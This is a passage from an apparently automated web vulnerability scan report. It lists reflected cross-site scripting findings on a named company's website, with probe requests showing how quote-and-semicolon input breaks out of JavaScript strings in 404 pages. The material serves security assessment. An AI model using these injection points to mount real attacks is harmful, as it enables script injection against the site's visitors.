GET /about/news/presskits58b31"%3bde6ac351f01/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:37 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49751
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/presskits58b31";de6ac351f01/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.458. http://www.verizonbusiness.com/about/news/presskits/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/presskits/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4fcf'%3b2390c35a601 was submitted in the REST URL parameter 3. This input was echoed as a4fcf';2390c35a601 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/presskitsa4fcf'%3b2390c35a601/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:04 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49749
Date: Wed, 17 Nov 2010 00:53:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/presskitsa4fcf';2390c35a601/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.459. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/social/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc45b'%3b999e20b66d4 was submitted in the REST URL parameter 1. This input was echoed as dc45b';999e20b66d4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutdc45b'%3b999e20b66d4/news/social/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/aboutdc45b';999e20b66d4/news/social/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.460. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/social/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e57e"%3bbad14447f2f was submitted in the REST URL parameter 1. This input was echoed as 4e57e";bad14447f2f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about4e57e"%3bbad14447f2f/news/social/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about4e57e";bad14447f2f/news/social/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.461. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/social/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9b21'%3b082cea29f1a was submitted in the REST URL parameter 2. This input was echoed as a9b21';082cea29f1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsa9b21'%3b082cea29f1a/social/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:47 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47097
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/newsa9b21';082cea29f1a/social/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.462. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/social/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96912"%3b89df30daca4 was submitted in the REST URL parameter 2. This input was echoed as 96912";89df30daca4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news96912"%3b89df30daca4/social/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:10 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47095
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news96912";89df30daca4/social/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBM
...[SNIP]...

1.463. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/social/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef700'%3b12f2670c9e was submitted in the REST URL parameter 3. This input was echoed as ef700';12f2670c9e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/socialef700'%3b12f2670c9e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:18 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49741
Date: Wed, 17 Nov 2010 00:53:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/socialef700';12f2670c9e/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.464. http://www.verizonbusiness.com/about/news/social/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/social/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 424ff"%3b1b3201e3aaa was submitted in the REST URL parameter 3. This input was echoed as 424ff";1b3201e3aaa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/social424ff"%3b1b3201e3aaa/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49743
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/social424ff";1b3201e3aaa/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.465. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/socialmedia/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f461f'%3bf909a722933 was submitted in the REST URL parameter 1. This input was echoed as f461f';f909a722933 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutf461f'%3bf909a722933/socialmedia/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:07 GMT
Content-Type: text/html
Content-Length: 40636
Date: Wed, 17 Nov 2010 00:53:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/aboutf461f';f909a722933/socialmedia/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.466. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/socialmedia/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb861"%3b210de19a23 was submitted in the REST URL parameter 1. This input was echoed as bb861";210de19a23 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutbb861"%3b210de19a23/socialmedia/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutbb861";210de19a23/socialmedia/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.467. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/socialmedia/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77ab4'%3b111527fb9a4 was submitted in the REST URL parameter 2. This input was echoed as 77ab4';111527fb9a4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/socialmedia77ab4'%3b111527fb9a4/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:45 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47095
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/socialmedia77ab4';111527fb9a4/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.468. http://www.verizonbusiness.com/about/socialmedia/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/socialmedia/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ab61"%3b636568d8090 was submitted in the REST URL parameter 2. This input was echoed as 3ab61";636568d8090 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/socialmedia3ab61"%3b636568d8090/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:22 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47095
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/socialmedia3ab61";636568d8090/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.469. http://www.verizonbusiness.com/ar/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ar/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cfab'%3bfa34b7a49bb was submitted in the REST URL parameter 1. This input was echoed as 4cfab';fa34b7a49bb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ar4cfab'%3bfa34b7a49bb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:59 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47573
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/ar4cfab';fa34b7a49bb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.470. http://www.verizonbusiness.com/ar/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ar/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f988"%3bde4e7751f0d was submitted in the REST URL parameter 1. This input was echoed as 8f988";de4e7751f0d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ar8f988"%3bde4e7751f0d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
